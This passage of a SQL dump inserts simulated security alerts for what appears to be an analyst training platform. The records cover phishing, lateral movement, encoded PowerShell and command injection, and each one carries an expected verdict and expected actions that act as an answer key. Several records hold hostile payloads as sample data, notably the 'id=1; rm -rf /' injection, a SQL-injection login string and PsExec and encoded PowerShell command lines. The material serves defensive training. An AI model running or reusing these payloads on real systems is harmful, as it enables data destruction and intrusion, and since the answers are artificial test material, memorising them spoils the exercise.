192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:22.361Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"host-002\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(717, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received with a URL designed to harvest credentials. The email mimics a trusted service to lure the user.', 'Phishing', 'T1566', 1, 'Closed', 177, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.20\",\"email_sender\":\"no-reply@trustedservice.com\",\"username\":\"mjane\",\"hostname\":\"host-003\",\"url\":\"http://malicious-site.com/login\"}', '2026-01-09 19:07:59', '2026-02-22 10:25:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with phishing activity\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@trustedservice.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Email appears to mimic a trusted domain\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL is flagged as a credential harvesting site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL in the phishing email is confirmed to be used for credential harvesting, indicating a true positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with Malicious URL Detected\",\"date\":\"2026-02-01T20:32:22.363Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(718, 'False Positive Alert: Unusual Internal Traffic', 'low', 'Firewall', 'Detected unusual traffic patterns between internal hosts. Further analysis indicates this is benign activity related to scheduled maintenance.', 'Network Traffic Anomaly', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T08:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"n/a\",\"hostname\":\"n/a\",\"request_body\":\"n/a\"}', '2026-01-10 22:11:35', '2026-02-22 14:54:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The traffic is consistent with scheduled internal maintenance tasks, confirming a false positive.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(719, 'APT29 Lateral Movement Detected via PsExec', 'critical', 'CrowdStrike', 'A potential APT29 operation has been detected using PsExec to move laterally within the network. Internal IP communication suggests compromised credentials.', 'Lateral Movement', 'T1077', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T03:14:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.21\",\"dst_ip\":\"10.0.0.34\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\"}', '2026-01-10 01:17:50', '2026-02-16 18:05:31', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user account potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec tool commonly used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec usage between internal machines indicates possible lateral movement by APT29.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(720, 'Spear-Phishing Email with Malicious URL', 'high', 'Proofpoint', 'An email from a suspicious sender was detected containing a malicious URL likely used for credential harvesting.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:25:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.45\",\"username\":\"jane.smith\",\"hostname\":\"LAPTOP-04\",\"email_sender\":\"support@secure-mail.com\",\"url\":\"http://malicious-website.com/login\"}', '2026-01-11 06:08:40', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 12 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-website.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing credential harvest\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain used for spoofing legitimate services\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL attempting to mimic legitimate services.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear-Phishing Email with Malicious URL\",\"date\":\"2026-02-01T20:32:22.366Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(721, 'Encoded PowerShell Command Execution Detected', 'high', 'Wazuh', 'An encoded PowerShell command was detected on a user machine, indicating possible fileless malware activity.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"username\":\"michael.brown\",\"hostname\":\"DESKTOP-07\",\"command_line\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\"}', '2026-01-10 07:11:45', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP potentially executing fileless malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Encoded command associated with malware delivery\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of encoded PowerShell commands is indicative of fileless malware techniques often used by APT groups.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.367Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T15:42:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"michael.brown\\\",\\\"hostname\\\":\\\"DESKTOP-07\\\",\\\"command_line\\\":\\\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(722, 'False Positive: Anomalous Login Activity', 'medium', 'Splunk', 'Multiple failed login attempts detected from a foreign IP address. Investigation reveals this is a legitimate user traveling.', 'Credential Attack', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T13:05:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"104.28.0.34\",\"dst_ip\":\"10.0.0.12\",\"username\":\"john.doe\",\"hostname\":\"SERVER-02\",\"failed_attempts\":8}', '2026-01-10 00:28:18', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"104.28.0.34\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not associated with malicious activity, identified as part of legitimate travel\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"User confirmed to be on business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"User was traveling, resulting in login attempts from an unusual location. No malicious intent detected.\"}', 'Advanced', 'SIEM', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:31:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:30:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:29:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:28:22.368Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T13:05:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"104.28.0.34\\\",\\\"dst_ip\\\":\\\"10.0.0.12\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"SERVER-02\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(723, 'APT41 Spear-Phishing Attack Detected via Malicious Email Link', 'critical', 'Proofpoint', 'A spear-phishing email containing a malicious link was detected targeting a high-level executive. The email was crafted to appear as a legitimate communication from a trusted partner.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:15:23Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.112\",\"dst_ip\":\"192.168.1.105\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-12\",\"email_sender\":\"ceo@trustedpartner.com\",\"url\":\"http://malicious-link.com/verify\",\"subject\":\"Urgent: Verify Your Account\"}', '2026-01-10 09:08:55', '2026-02-16 18:04:37', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.112\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1024 times for phishing and spam activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"ceo@trustedpartner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Spoofed domain detected\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The alert is a true positive as the email contained a malicious link that was confirmed to be part of a phishing campaign.\"}', 'Expert', 'NDR', 9, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"APT41 Spear-Phishing Attack Detected via Malicious Email Link\",\"date\":\"2026-02-01T20:32:22.369Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(724, 'Lazarus Group Fileless Malware Execution Detected', 'high', 'CrowdStrike', 'A fileless malware was executed using PowerShell obfuscation techniques. The execution was traced back to a known Lazarus Group C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:37:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"198.51.100.47\",\"dst_ip\":\"192.168.1.45\",\"username\":\"admin\",\"hostname\":\"SERVER-01\",\"command_line\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"file_hash\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\"}', '2026-01-10 02:51:53', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.47\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Associated with Lazarus Group C2 infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -enc WwBTAFkAUwB0AGUAbQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkAZQBuAHQAXQAuAEQAbwB3AG4AbABvAGEAZABTAHIAdABhAG0AIAA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected obfuscation technique used by APT actors\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"4c2f5e0b9a3b4f1f8c37a3f9f2a4b1d0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent fileless malware campaigns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The use of PowerShell obfuscation and the link to a known Lazarus C2 server confirms this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(725, 'Cozy Bear Command Injection via Web Request', 'critical', 'Wazuh', 'A command injection attempt was detected via a vulnerable web application endpoint, originating from a Cozy Bear associated IP.', 'Web Attack', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:02:59Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.200\",\"username\":\"webapp\",\"hostname\":\"WEB-SERVER-03\",\"request_body\":\"id=1; rm -rf /\",\"url\":\"http://victim-site.com/update\"}', '2026-01-11 02:15:21', '2026-02-16 18:03:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple Cozy Bear related attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id=1; rm -rf /\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://victim-site.com/update\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"URL targeted in previous Cozy Bear campaigns\"}}],\"expected_actions\":[\"block_ip\",\"patch_vulnerability\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The command injection payload and known Cozy Bear IP confirm this as a true positive.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.371Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:02:59Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.55\\\",\\\"dst_ip\\\":\\\"192.168.1.200\\\",\\\"username\\\":\\\"webapp\\\",\\\"hostname\\\":\\\"WEB-SERVER-03\\\",\\\"request_body\\\":\\\"id=1; rm -rf 